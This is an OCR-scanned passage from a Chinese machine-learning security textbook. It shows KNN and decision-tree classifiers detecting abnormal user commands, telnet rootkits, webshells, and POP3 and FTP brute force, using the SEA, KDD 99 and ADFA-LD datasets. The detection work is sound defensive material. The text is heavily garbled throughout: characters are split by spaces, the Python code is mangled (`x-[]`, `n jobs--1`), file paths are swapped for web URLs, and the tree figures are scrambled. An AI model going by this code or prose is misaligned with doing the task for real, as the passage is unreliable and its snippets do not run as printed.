图 5-4 操作 日 志 的 目录 结构 


User4 

User4@ 
User41 
User42 
User43 
User44 
User45 
User46 
User4/ 
User48 
User49 





User5 
User>g 
Usero 
User/ 
User8 
User9 
label.txt 





依次 读 取 每 行 操作 命令 ,每 100 个 命令 组 成 一 个 操作 序列 ， 保 存在 列表 里 面 : 


图 5-5 操作 日 志 的 内 容 











with open(filename) as f: 








for line in f: 

line=line.strip('\n') 

x.append (line) 

dist.append (line) 

it=1 

if i = 100: 

cmd list.append (x) 
] 




















统计 最 频繁 使 用 的 前 50 个 命令 和 最 不 频繁 的 前 ?0 个 命令 : 








fdist = FreqDist (dist) .keys () 
dist max-set (fdist[0:50]) 
dist min = set(fdist[-50:]) 























(1) 去 重 操作 命令 的 个 数 。 


以 100 个 命令 为 统计 单元 ， 作 为 一 个 操作 序列 ， 去 重 后 的 操作 命令 个 数 作为 特征 。 


fl-len (set (cmd block)) 








(2) 最 频繁 使 用 的 前 10 个 命令 。 


最 频繁 使 用 的 命令 从 某 种 程度 上 反映 出 当前 用 户 的 操作 习惯 。 





fdist = FreqDist (cmd block) .keys () 
F2=fdist [0:10] 

















(3) 最 不 频繁 使 用 的 前 10 个 命令 。 


最 不 频繁 使 用 的 命令 也 从 某 种 程度 上 反映 出 当前 用 户 的 使 用 习惯 。 











fF3=fdist 





[-10:] 





以 user3 为 例 ， 在 完整 的 数据 集合 上 统计 其 操作 命令 ， 去 重 后 获得 一 个 操作 命令 的 字典 : 





['more', 


'emacs-20', 


对 应 的 特征 为 : 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


'netscape', 


"aacdec', 


'cat', 











taj 





tfplay', 


'sh!, 





[36, 


KNN 只 能 以 标量 作为 输入 参数 ， 所 以 需要 将 f2 和 f3 标 量化 ， 最 简单 的 方式 就 是 和 统计 的 最 频繁 使 用 的 前 50 





f2 = len(set ( 
f3-len (set (£3) &set (d 


['gettxt', 











'xsetroot', 


f2) & set(dist max)) 





ist min)) 


'xhost', 


'kill', 


'xrdb', 


'wait4wm'], 


['cat', 


'sh!, 


'Xprop', 


"cpp", 


'more', 


MASA 


'launchef 





1] 


上 命令 以 及 最 不 频繁 使 用 的 前 50 个 命令 计算 重合 程度 : 





3. 训 


标识 文件 的 内 


从 标识 文件 中 加 载 针 对 操作 序列 正常 和 异常 的 标识 : 


de 





f get ] 


练 模型 





(£ii 


abe] 





x= 








[] 





wi 


th 


For 





open ( 








filename) 
line in f: 














line-line.st 


sua. As 


A: BHT 


ename, index=0) : 





as f: 





rip('\n') 


x.append( int(line.split() [index]) ) 


return X 


加 载 user3 的 操作 数据 ， 并 将 前 120 个 操作 序列 作为 训 


user cmd list,user cmd dist max,user cmd dist min-load 1 























50 列 ， 分 别 代表 每 个 用 户 的 当前 操作 序列 ， 正 常 操作 标识 为 0， 异 常 操作 标识 为 1。 


练 序列 ， 后 30 个 操作 序列 作为 测试 序列 。 


user cmd ("http://www.hzcourse.com/resource/readl 


user cmd feature-get user cmd feature(user cmd list,user cmd dist max,user cmd dist min) 


labels-get label ("ht 








y-[0] *50+labels 





























x train-user cmd feature[0:N] 
y train-y[0:N] 

x test-user cmd feature[N:150] 
y test-y[N:150] 














tp://www.hzcourse.com/resource/readi 





Book?path-/openresources/teach ebook/uncompressed/16472/0l 


Book?path-/openresources/1 











EBPS/Text/../da 





ta/MasqueradeDat/label.txt", 2) 











teach ebook/uncompressed/16472/OEBPS/Text/../date 





VS FIKNNBESOEETI 


neigh = KNeighborsClassiÍ 
t (x train, y train) 


ne 





练 : 





Fier(n neighbors-3) 











igh.fi 





y predici 





t-neigh.predict (x test) 








4. 效 果 验 证 


测试 结果 表明 ， 准 确 率 约 80%， 不 是 很 理想 。 





score-np.mean(y test--y predict) *100 





5.4 示例 : SAKES AEE (C) 


5.3 示 例 中 只 比较 了 最 频繁 和 最 不 频繁 的 操作 命令 ， 我 们 这 次 尝试 进行 全 量 比较 。 


1 .数据 搜集 和 数据 清 


整 演示 代码 请 见 本 书 GitHub 上 的 5-3.py。 


我 们 使 用 词 集 的 模型 ， 将 全 部 命令 去 重 后 形成 一 个 大 型 向 量 空间 ， 每 个 命令 代表 一 个 特征 ， 首 先 通过 遍历 全 部 命令 ， 生 成 对 应 的 词 集 。 





with open (fil 


for 











line in f: 








fd 











ename) 





as f: 





dist.append( 


line=line.strip('\n"') 


line) 


ist = FregDist (dist) .keys () 





生成 的 词 集 为 : 


Dist: (['gs', 


'"tset', 


"basename', 


'uname', 


"touch, ' 





find', 


Min! y 


'unpack', 


quit 


'tail', 


'ls!, 


"st 


"gt, 


'ksh', 


'get', 


'xdm', 


'xterm', 


'cpio', 


'getpgrp', 


'grep', 


'gethost', 





2. 特 征 化 


使 用 词 集 将 操作 命令 向 量化 。 





de 














i 








user cmd 1 





— 





v[i]+=1 














— 


): 


Feature.append (v) 





return user cmd 1 


feature 





f get user cmd feature new (user cmd list,dist): 
user cmd feature-[ 
for cmd list in user cmd list: 
v-[0]*len(dist) | 
for i in range (0, len (dist 
if dist[i] in cmd list: 





3. 训 练 模型 











user cmd list,dist-load user cmd new("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/MasqueradeDat/User3") 
user cmd feature-get user cmd feature new(user cmd list,dist) 
#print user cmd feature 

labels-get label ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/MasqueradeDat/label.txt",2) 


y=[0]*50+labels 
neigh = KNeighborsClassifier(n neighbors-3) 
































4. 效 果 验 证 


使 用 交叉 验证 ，10 次 随机 取样 和 验证 ， 提 高 验证 可 信 度 。 





cross validation.cross val score(neigh, user cmd feature, y, n jobs--1,cv-10) 


[ Xa l- 093333333. Ls 1. Ls Ls 
] 0.93333333 0.92857143] 








准确 率 达 到 93% 以 上 ， 非 常 不 错 了 ! 


5.5 示例 : 使 用 K 近 领 算 法 检测 Rootkit 

Rootkit 是 一 种 特殊 的 恶意 软件 ， 它 的 功能 是 在 安装 目标 上 隐藏 自身 及 指定 的 文件 、 进 程 和 网 络 链接 等 信息 ， 比 较 常 见 的 是 Rootkit， 一 般 都 和 木马 、 后 门 等 其 他 恶意 程序 结合 使 用 。 这 次 我 们 基于 KDD 
99 的 样本 数据 ， 尝 试 使 用 KNN 算 法 识别 基于 telnet 连 接 的 Rootkit 行 为 ， 检 测 流程 如 图 5-6 所 示 。 针 对 KDD 99 数 据 的 详细 介绍 请 参考 第 3 章 的 相关 内 容 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 5-4.py。 

1. 数 据 搜集 和 数据 清洗 

KDD 99 数 据 已 经 完成 了 大 部 分 的 数据 清洗 工作 ，KDD 99 数 据 集中 每 个 连接 用 41 个 特征 来 描述 : 


,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,221,3,0.01,0.03,0.00,0.00,0.00,0.00,0.00,0.00, rootkit. 
0,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,52,0.20,0.03,0.20,0.00,0.20,0.00,0.02,0.00, rootkit. 
0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,226,4,0.02,0.03,0.00,0.00,0.00,0.00,0.00,0.00, rootkit. 


与 Rootkit 相关 特征 





35,tcp,ftp,SFE,96,533,0,0,0,1, 0, 1,0 
0,tcp,ftp data,SF,116,0,0,0,0,0,0, 
15,tcp,ftp,SF,45,214,0,0,0,0,0,1,0 
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KDD 99 


数据 
41 维特 征 


筛选 与 Rootkit 基于 tcp e 5j Rootkit 18 
相关 特征 内 容 的 特征 天 的 特征 向量 









KNN Six +10 
Ht 32 SZ Br WE 


评估 效果 


图 5-6 ”基于 telnet 连 接 的 Rootkit 检 测 流 程 


其 中 和 Rootkit 相 关 的 特征 主要 为 TCP 连 接 的 内 容 特征 ， 详 见 表 5-1。 


表 5-1 KDD 99 TCP 连 接 内 容 特 征 


特征 名 称 数据 类 型 


hot 连续 类 型 


num failed logins 连续 类 型 


logged in 离 艇 类 
num compromised ”连续 类 
root shell 离散 类 
su attempted 离散 类 
num root 连续 类 
num file creations 连续 类 
num shells 连续 类 
num access files 连续 类 


num outbound cmds 连续 类 


is hot login 离散 
is guest login 离散 
加 载 KDD 99 数 据 集中 的 数据 : 


def load kdd99 (filename): 
x-[] 
with open (1 Filename) as f: 
for line in f: 

line=line.strip('\n"') 
































line=line.split(',') 
x.append (line) 
return x 





访问 系统 敏感 文件 和 目录 的 次 数 ， 连 续 ， 范 围 是 [0, 101]。 例 如 ， 访 问 系统 目 


录 ， 建 立 或 执行 程序 等 


登录 答 试 失败 的 次 效 ， 连 续 ， 范 围 是 [0, 5] 

成 功 登录 则 为 1， 否 则 为 0, n. 取 值 为 0 或 1 

compromised 条 件 出 现 的 次 数 ， 连 续 ， 范 围 是 [0, 7479] 

右 获 得 root shell 则 为 1， 否则 为 0， 离 散 ， 取 值 为 0 或 1。root_shell 是 指 获得 


超级 用 户 权限 


右 出 现 ”suroot ”命令 则 为 1， 否则 为 0， 离 散 ， 取 值 为 0 或 1 

root 用 户 访 问 次 效 ， 连 续 ， 范 围 是 [0, 7468] 

文件 创建 操作 的 次 数 ， 连 续 ， 范 围 是 [0, 100] 

使 用 shell 命令 的 次 数 ， 连 续 ， 范 围 是 [0, 5] 

访问 控制 文件 的 次 数 ， 连 续 ， 旋 围 是 [0, 9], PIN, XF /etc/passwd 或 .rhosts X 


件 的 访问 


一 个 FTP 会 话 中 出 站 连接 的 次 数 ， 连 续 ， 取 值 为 0。 数据 集中 这 一 特征 出 现 次 


数 为 0 


登录 是 否 属于 “hot” 列 表 ， 是 为 1， 否则 为 0， 离 散 ， 取 值 为 0 或 1。 例 如 超 


级 用 户 或 管理 员 登 录 


FE guest 登录 则 为 1， 否则 为 0， 离散 ， 取 值 为 0 或 1 





入 选 标记 为 Rootkit 和 normal 且 是 telnet 协 议 的 数据 : 





if ( x1[41] in ['rootkit.','normal.'] ) and 
if xl[41] == 'rootkit.': 

y.append (1) 
e] 





lse: 
y. append (0) 


2. 特 征 化 
挑选 与 Rootkit 相 关 的 特征 作为 样本 特征 : 


xl = x1[9:21] 
V. append (x x1) 
for xl inv: 
vi-[] 
for x2 in xl: 























vl.append (float (x2)) 
w.append (v1) 


3. 训 练 样本 


实例 化 KNN 算 法 ， 邻 居 数 设置 为 3: 


( x1[2] 


— 'telnet' ): 











clf = KNeighborsClassifier(n neighbors-3) 





4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 。 





print cross validation.cross val score(clf, 


测试 结果 如 下 ， 准 确 率 约 为 90%。 


[ 0.9 0.9 
1 Ls 








X, y, n jobs--1,cv-10) 


0.77777778 





5.6 示例 : 使 用 KE 邻 算 法 检测 Webshell 


完整 演示 代码 请 见 本 书 GitHub 上 的 5-5.py。 


1. 数 据 搜集 和 数据 清洗 
使 用 ADFA-LD 数 据 集中 Webshell 相 关 数 据 ，ADFA-LD 数 据 集中 记录 下 了 系统 调用 序列 ， 比 如 (系统 调用 A、 系 统 调 用 B、 系 统 调用 C) ， 然 后 使 用 数字 标识 每 一 个 系统 调用 ， 这 样 就 转换 成 了 系统 调用 
序列 (1, 2, 3) ， 这 时 (1, 2, 3) 就 转换 成 了 一 个 序列 向 量 ， 如 图 5-7 所 示 。ADFA-LD 数 据 集 的 详细 介绍 请 阅读 第 3 章 相关 内 容 。 


AAT Web 服务 从 


二 


WebShell 





AAA ARAB) ABV AAC 


使 用 词 集 模型 转换 成 系统 调用 向 量 





图 5-7 ADFA-LD 数 据 集 将 系统 调用 的 顺序 抽象 成 序列 向 量 


加 载 ADFA-LD 中 的 正常 样本 数据 : 











def load adfa training files (rootdir): 

x-[] 

y-[] 

list = os.listdir (rootdir) 

for i in range(0, len(list)): 
path = os.path.join(rootdir, list[i]) 

if os.path.isfile (path): 
x.append (load one flle (path) ) 
y.append (0) 

return X,y 




















定义 遍历 目录 下 文件 的 函数 : 





def dirlist(path, allfile): 





filelist = os.listdir (path) 

or filename in filelist: 

filepath = os.path.join(path, filename) 
if os.path.isdir(filepath): 
dirlist(filepath, allfile) 

else: 
allfile.append (filepath) 
return allfile 










































































从 攻击 数据 集中 筛选 和 Webshell 相 关 的 数据 : 








def load adfa webshell files (rootdir): 











allfile-dirlist (rootdir, []) 

or file in allfile: 

if re.match( 

r" http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/Web Shell \d+/UAD-W*", 
L e): 





















































x.append (load one flle(file)) 
y.append (1 
return X,y 





— 


2. 特 征 化 


由 于 ADFA-LD 数 据 集 都 记录 了 函数 调用 序列 ， 每 个 文件 包含 的 函数 调用 序列 的 个 数 都 不 一 致 ， 可 以 参考 第 3 章 中 的 词 集 模型 进行 特征 化 。 











xlvy1=1oadq adfa training files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Training Data Master 
X2,y2- load adfa webshell files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/" 
x=x1+x2 
y-ylty2 
vectorizer - CountVectorizer (min df-1) 
x-vectorizer.fit transform(x) i 
x-x.toarray() 






























































3. 训 





练 样本 


实例 化 KNN 算 法 ， 其 中 邻居 个 数 设置 为 3: 











clf = KNeighborsClassifier(n neighbors=3) 





4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 。 








print cross validation.cross val score(clf, x, y, n jobs--1,cv-10) 


测试 结果 如 下 ， 准 确 率 约 为 95%。 


[ 0.97916667 0.9375 0.97916667 0.93684211 0.95789474 0.84210526 
0.96842105 0.97894737 0.9787234 0.9787234 ] 





57 本章 小 结 


本 章 重 点 介绍 区 近邻 的 基础 知识 以 及 Web 安 全 领域 的 相关 应 用 ， 包 括 检测 Linux 服 务 器 异常 系统 操作 、 基 于 telnet 协 议 的 Rootkit 检 测 等 。 后 面 章节 我 们 将 陆续 介绍 其 他 分 类 算法 ， 不 同 的 分 类 算法 没有 好 坏 
之 分 ， 在 不 同 的 数据 集 和 不 同 的 应 用 场景 下 ， 性 能 表现 可 能 差距 很 大 。 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
- http://www.freebuf.com/articles/system/97703.html 
- http: //www.fx361.com/page/2016/1018/284843.shtml 
- http://www.freebuf.com/articles/system/97703.html 
“ https://www.unsw.adfa.edu.au 


: http://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html 


[1] Schonlau M, Couper M.Semi-Automated Categorization of Open-Ended Questions.Survey Research Methods, August 2016. 


[] KA, PAR, WARM BHESRKDD CUP99 研 究 四 .计算 机 工程 与 设计 ，2010，22 


第 6 草 ”决策 树 与 随机 森林 算法 


决策 树 和 随机 森林 是 常见 的 分 类 算法 ， 尤 其 是 决策 树 ， 判 断 的 逻辑 很 多 时 候 和 人 的 思维 非常 接近 ， 人 们 在 遇 到 多 种 条 件 组 合作 为 判断 依据 时 ， 可 以 画 出 一 棵 决策 树 作 为 判断 逻辑 。 本 章 将 介绍 决策 树 和 


随机 森林 工法 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 然 后 介绍 如 何 使 用 这 两 个 算法 检测 FIP 的 暴力 破解 。 


6.1 决策 树 算法 概述 


韩 梅 梅 是 某 互联 网 公司 的 女 码 农 ， 平 时 生活 圈子 很 小 ， 周 围 同事 追求 她 的 也 不 少 ,但 是 没有 一 个 是 她 满意 的 ， 于 是 她 开始 在 交友 网 站 上 发 布 个 人 信息 。 她 把 自己 筛选 约会 对 象 的 逻辑 进行 梳理 ， 如 图 6-1 
所 示 。 

决策 树 表现 了 对 象 属性 与 对 象 值 之 间 的 一 种 映射 关系 。 决 策 树 中 每 个 节点 表示 某 个 对 象 ， 而 每 个 分 又 路 径 则 代表 某 个 可 能 的 属性 值 ， 而 每 个 叶 节点 则 对 应 从 根 节点 到 该 叶 节 点 所 经 历 的 路 径 所 表示 的 对 
象 值 。 数 据 挖 所 中， 决策 树 是 一 种 经 常 要 用 到 的 技术 ， 可 以 用 于 数据 分 类 ， 同 样 也 可 以 用 于 预测 。 



































下 面 是 个 简单 的 例子 : 

>>> from sklearn import tree 

>>> X = [[0, 0], [1, 11] 

>>> Y = [0, 1] 

>>> clf = tree.DecisionTreeClassifier () 
>>> clf = clf.fit(X, Y) 

结果 预测 为 : 


>>> clf.predict([[2., 2.]]) array([1]) 











图 6-1 ， 韩 梅 梅 约会 男 网 友 的 决策 树 


6.2 示例 : hello world! 决策 树 


Scikit-Learn 自 带 了 iris 数 据 集合 ，iris 集 合 具体 介绍 请 参考 第 3 章 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 6-1.py。 


导入 需要 的 函数 库 ， 加 载 iris 数 据 集 : 





from sklearn.datasets import load iris 
from sklearn import tree 

import pydotplus 

iris = load iris() 




















使 用 决策 树 算法 进行 训练 ， 并 将 训练 得 到 的 决策 树 保存 成 pdf 文件 : 
























































clf = tree.DecisionTreeClassifier () 
clf = clf.fit(iris.data, iris.target) 
dot data = tree.export graphviz(clf, out file-None) 

















graph = pydotplus.graph from dot data (dot data) 
graph.write pdf ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../photo/6/iris.pdf") 





























训练 得 到 的 可 视 化 决策 树 如 图 6-2 所 示 。 


X[2] <= 2.45 
gini — 0.6667 


samples = 150 
value = [50, 50, 50] 





False 
X[3] <= 1.75 
gini — 0.5 
samples = 100 
value = [0, 50, 50] 


gini — 0.0 
samples — 50 
value = [50, 0, 0] 


X[2] <= 4.95 X[2] <= 4.85 

gini — 0.168 gini — 0.0425 

samples — 54 samples — 46 
value = [0, 49, 5] value = [0, 1, 45] 


X[3] <= 1.65 X[3] <= 1.55 X[1] <= 3.1 

gini — 0.0408 gini — 0.4448 gini — 0.4444 

samples — 48 samples = 6 samples = 3 
value = [0, 47, 1] value = [0, 2, 4] value - [0, 1, 2] 


gini — 0.0 
samples — 43 
value = [0, 0, 43] 


X[2] <= 5.45 
gini — 0.4444 
samples = 3 
value = [0, 2, 1] 


gini = 0.0 gini = 0.0 
samples = 2 samples = 1 
value = [0, 0, 2] value = [0, 1, 0] 


gini = 0.0 gini = 0.0 gini = 0.0 
samples = 47 samples = 1 samples = 3 
value = [0, 47, 0] value = [0, 0, 1] value = [0, 0, 3] 


gini = 0.0 gini = 0.0 
samples = 2 samples = 1 
value = [0, 2, 0] value = [0, 0, 1] 





图 6-2 itis 数 据 集 得 到 的 可 视 化 决策 树 


6.3 示例 : 使 用 决策 树 算法 检测 POP3 暴 力 破 解 


完整 演示 代码 请 见 本 书 GitHub 上 的 6-2.py。 
1. 数 据 搜 集 和 数据 清洗 


使 用 KDD 99 数 据 集中 POP3 的 相关 数据 ，KDD 99 数 据 集 详细 介绍 请 阅读 第 3 章 相关 内 容 : 

























































































4,tcp,pop 3,SF,30,93,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,255,1.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,guess passwd. 
4,tcp,pop 3,SF,28,93,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,255,1.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,guess passwd. 
4,tcp,pop 3,SF,30,93,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,255,1.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,guess passwd. 
加 载 KDD 99 数 据 集中 的 数据 : 
def load kdd99 (filename): 
x-[] 
with open(filename) as f: 
for line in f: 
line=line.strip('\n"') 
line-line.split(',') 
x.append (line) 
return X 
筛选 标记 为 quess-passwd 和 normal 且 是 POP3 协 议 的 数据 : 
for xl in x: 
if ( x1[41] in ['guess passwd.','normal.'] ) and ( x1[2] == 'pop 3' ): 
if x1[41] == 'guess passwd.': 
y.append (1) 
else: 
y.append (0) 





2. 特 征 化 
挑选 与 POP3 密 码 破 解 相关 的 网 络 特征 以 及 TCP 协 议 内 容 的 特征 作为 样本 特征 : 


xl = [x1[0]] + x1[4:8]+x1[22:30] 


v.append (x1) 
for xl in v : 
vi-[] 
for x2 in xl: 
vl.append (float (x2) ) 
w.append (v1) 








3. 训 练 样本 





实例 化 决策 树 算法 : 





clf = tree.DecisionTreeClassifier () 








4. 效 果 验 证 
我 们 使 用 十 折 交 叉 验 证 : 


f, X, y, n jobs--1,cv-10) 





print cross validation.cross val score (cli 





测试 结果 如 下 ， 准 确 率 约 为 9996 : 


[0.98637602 1. d dox 
Ts Ts Ts ] 








可 视 化 训练 得 到 的 决策 树 为 : 














dot data = tree.export graphviz(clf, out file-None) 


graph - pydotplus.graph from dot data(dot data) 
graph.write pdf ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../photo/6/iris-dt.pdf") 




















可 视 化 决策 树 如 图 6-3 所 示 。 


X[1] <= 33.5 
gini = 0.0082 


samples = 3657 
value = [15, 3642] 

True \ False 
X[1] <= 37.0 
gini = 0.375 
samples = 20 

value = [15, 5] 





gini = 0.0 
samples = 3637 
value = [0, 3637 | 


X[2] <= 183.0 
gini — 0.4938 
samples = 9 
value = [4, 5| 


gini — 0.0 
samples = 11 
value = [11, 0] 


gini = 0.0 gini = 0.0 
samples = 4 samples = 5 
value = [4, 0| value = [0, 5| 





图 6-3 ”使 用 决策 树 检测 暴力 破解 训练 得 到 的 决策 树 


6.4 示例: 使 用 决策 树 算法 检测 FTP 暴 力 破解 
完整 演示 代码 请 见 本 书 GitHub 上 的 6-3.py 
1 数据 搜集 和 数据 清洗 


使 用 ADFA-LD 数 据 集中 FTP 暴 力 破解 的 相关 数据 ，ADFA-LD 数 据 集 详细 介绍 请 阅读 第 3 章 相 关内 容 。ADFA-LD 系 统 调用 可 抽象 成 向 量 ， 如 图 6-4 所 示 。 





HIDS 记录 下 系统 调用 序列 


A ARAB) AARC 





使 用 词 集 模型 转换 成 系统 调用 回 量 





加 载 ADFA-LD 中 的 正常 样本 数据 : 





def load adfa training files (rootdir): 

x-[] 

y=[] 

list = os.listdir (rootdir) 

for i in range(0, len(list)): 
path = os.path.join(rootdir, list[i]) 

if os.path.isfile (path): 
x.append (load one flle (path) ) 
y.append (0) 

return X,y 



































图 6-4 ADEFA-LD 系 统 调用 抽象 成 向 量 





定义 遍历 目录 下 文件 的 函数 : 





def dirlist(path, allfile): 
filelist = os.listdir (path) 
for filename in filelist: 
filepath = os.path.join(path, filename) 
if os.path.isdir(filepath): 
dirlist(filepath, allfile) 
else: 
allfile.append (filepath) 


return allfile 







































































从 攻击 数据 集中 筛选 和 FTP 暴 力 破解 相关 的 数据 : 





def load adfa hydra ftp files (rootdir): 
x-[] 
y-l] 














allfile-dirlist (rootdir, []) 

For file in allfile: 

if re.match( 

r"http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/Hydra FTP Nd*/UAD-Hydra-FTP*", 
file): 





























I 


























x.append (load one flle(file)) 
y.append (1 
return X,y 





— 





2. 特 征 化 


由 于 ADFA-LD 数 据 集 都 记录 了 函数 调用 序列 ， 每 个 文件 包含 的 浮 数 调用 序列 的 个 数 都 不 一 致 ， 可 以 参考 第 3 章 中 的 词 集 模型 进行 特征 化 : 




















xl, yl=load adfa training files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Training Data Master/") 
x2, y2=load adfa hydra ftp files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/" 
x=Xx1+x2 
y-ylty2 
vectorizer - CountVectorizer (min df-1) 
x-vectorizer.fit transform(x) B 
x-x.toarray() 



























































3. 训 





练 样本 


实例 化 决策 树 算法 : 














clf = tree.DecisionTreeClassifier () 
4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验证 : 





print cross validation.cross val score(clf, x, y, n jobs--1,cv-10) 





测试 结果 如 下 ， 准 确 率 约 为 9596 : 





[ 1. 0.99009901 0.95 0.97979798 0.97979798 0.87878788 
0.98989899 0.97979798 0.94949495 0.95959596] 


可 视 化 训 





练 得 到 的 决策 树 为 : 











dot data = tree.export graphviz(clf, out file-None) 
graph = pydotplus.graph from dot data(dot data) 
graph.write pdf ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../photo/6/ftp.pdf") 









































可 视 化 决策 树 如 图 6-5 所 示 。 


X[123] <= 0.5 
gini= 0.2726 


samples = 995 
value = [833, 162] 








True False 
X[78] <= 0.5 X[125] <= 0.5 
gini= 0.4612 gini= 0.0437 
samples = 413 samples = 582 
value = [264, 149] value = [569, 13] 
X[1] <= 0.5 X[14] <= 63.0 X[94] <= 1.5 X[136] <= 3.5 
gini = 0.4606 gini = 0.1646 gini = 0.0147 gini = 0.3488 
samples = 203 samples = 210 samples = 542 samples = 40 
value = [73, 130] value = [191, 19] value = [538, 4] value = [31, 9] 
X[90] <= 14.0 X[32] <= 14.0 X[85] <= 0.5 mS X[19] «- 0.5 ||X[11] <= 0.5 X[69] <= 0.5 E 
gini = 0.4902 gini — 0.2624 gini 0.0859 || sim= 9.0 i M 


gini = 0.0075 gini — 0.32 gini = 0.4764 
samples = 532 ||samples = 10 samples = 23 
value = [530, 2] | | value = [8, 2] value = [14, 9] 


samples = 10 


samples — 17 
value = [0, 10] 


value = [17, 0] 


samples = 100 samples = 103 


samples = 200 


value = [57, 43] value = [16, 87] value = [191, 9] 
























X[12] <= 4.0 ini =0.0 X[34] <= 9.5 || X[1] <= 18.5 X[43] <= 0.5. || X[133] <= 0.5 ni-00 X[47] <= 0.5 ni-00 X[50] <= 6.0 || X[47] <= 1.5 

gini =0.3024 || EP? = 30 || gini - 0.1145 || gini = 0.4989 gini- 0.0208 || gini=0.42 || SM "cog || gini = 0.1588 S les cg | | gini = 0.2778 || gini = 0.3599 

samples = 70 hs a 30] samples = 82 samples = 21 samples = 190 || samples = 10 value = [509 0] samples = 23 vals [3 0] samples = 6 samples = 17 
value = [57, 13] : value = [5, 77] || value = [11, 10] : : 





value = [188, 2] || value = [3, 7] value = [21, 2] value = [1, 5] || value = [13, 4] 















X[137] <= 0.5 X[44] <= 0.5 X[78] <= 1.5 X[112] «- 5.5 X[69] <= 14.5 

























= 一 = = T = X[47] <= 0.5 | [一 一 
rh gini — 0.0 "eg. gini = 0.0 Ri gini — 0.0 gini = 0.0 P Mm gini = 0.0 Par gini — 0.0 gini — 0.0 TAS gini — 0.0 
Wo iaa samples = 3 Bu samples — 9 E ris samples = 1 || samples = 6 en samples = 20 any samples = 5 || samples = 1 Bam samples = 7 
value = [2, 77] value = [3, 0] value (2, 10 value = [9, 0]| | value = [188, 1] value = [0, 1] || value = [0, 6] value = [3, 1] value = [20, 0] value = [1, 2] value = [0, 5] || value = [1, 0] value = [6, 4] value = [7, 0] 
gini = 0.0 xis. 02758 || X24] S03 | gini=00 || gini-00 || gini=00 pita gini — 0.0 gini - 0.0 || gini - 0.0 gini- 0.0. || gini=0.0 X130] aos || gini - 0.0 
samples = 56 samples EE Ede - 7g samples = 1 || samples = 10 samples = 2 samples = 10 samples = 179 samples = 1 || samples = 3 samples = 2 || samples = 1 anes =7 samples = 3 
value = [56, 0] value = [1, 5] | value = [1, 77] value = [1, 0]| | value = [0, 10] || value = [2, 0] value — [9; 1] value = [179, 0] value = [0, 1]||value = [3, 0]| | value = [0, 2] || value = [1, 0] vallis -: T6; 1] value = [0, 3] 
gini=0.0 || gini=00 || gini=00 ] X417. 10 gini=0.0 || X211 7703 gini=0.0 || gini-0.0 
samples = 5 || sampbs =1 || samples = 74 AO A samples = 8 min Exi samples = 6 || samples = 1 
value = [0, 5] || value = [1, 0]] | value = [0, 74] valus =i, 31 value = [8, 0] value = [1, 1] value = [6, 0]|| value = [0, 1] 





gni = 0.0 gini = 0.0 gini = 0.0 
samples = 1 samples = 1 || samples = 1 
vahe = [1, 0] value = [0, 1] ||value = [1, 0] 


图 6-5 ”FIP 暴力 破解 决策 树 


6.5 ”随机 森林 算法 概述 


随机 森林 指 的 是 利用 多 棵 树 对 样本 进行 训 





练 并 预测 的 一 种 分 类 器 。 该 分 类 器 最 早 由 Leo Breiman 和 Adele Cutler 提 出 ， 并 被 注册 成 了 商标 。 随 机 森林 是 一 个 包含 多 个 决策 树 的 分 类 器 ， 并 且 其 输出 的 类 


别 是 由 个 别 树 输 出 的 类 别 的 众 数 而 决定 。 顾 名 思 义 ， 随 机 森林 是 用 随机 的 方式 建立 一 个 森林 ， 和 森林 由 很 多 的 决策 树 组 成 ， 随 机 森林 的 每 一 棵 决策 树 之 间 是 没有 关联 的 。 在 得 到 森林 之 后 ， 当 有 一 个 新 的 输入 
样本 进入 的 时 候 ， 就 让 森林 中 的 每 一 棵 决策 树 分 别 进行 判断 ， 看 看 这 个 样本 应 该 属于 哪 一 类 ， 然 后 看 看 哪 一 类 被 选择 最 多 ， 则 预测 这 个 样本 为 那 一 类 。 不 太 严谨 地 讲 ， 可 以 把 随机 森林 当 作 加 强 版 的 决策 
树 。 


